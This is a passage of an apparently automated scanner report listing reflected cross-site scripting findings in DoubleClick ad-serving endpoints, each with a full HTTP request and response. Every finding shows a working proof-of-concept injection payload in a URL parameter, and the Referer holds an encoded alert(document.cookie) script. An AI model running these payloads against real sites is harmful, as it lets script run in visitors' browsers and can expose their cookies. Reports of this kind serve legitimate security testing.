Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5f5"-alert(1)-"86f22d1910e was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd383'-alert(1)-'ea723a23d73 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8cec"-alert(1)-"2cdbd4fd8f3 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfcbc"-alert(1)-"87f30d13f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6038
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13fhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6b7'-alert(1)-'41e11d4dca9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6046
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:29:00 GMT
Expires: Mon, 07 Feb 2011 02:29:00 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 851cf'-alert(1)-'7daf788badb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62064"-alert(1)-"db102385c04 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e376e'-alert(1)-'bf4060873d4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f221"-alert(1)-"1a47e7ddd0c was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3696"-alert(1)-"456ec64c8fc was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
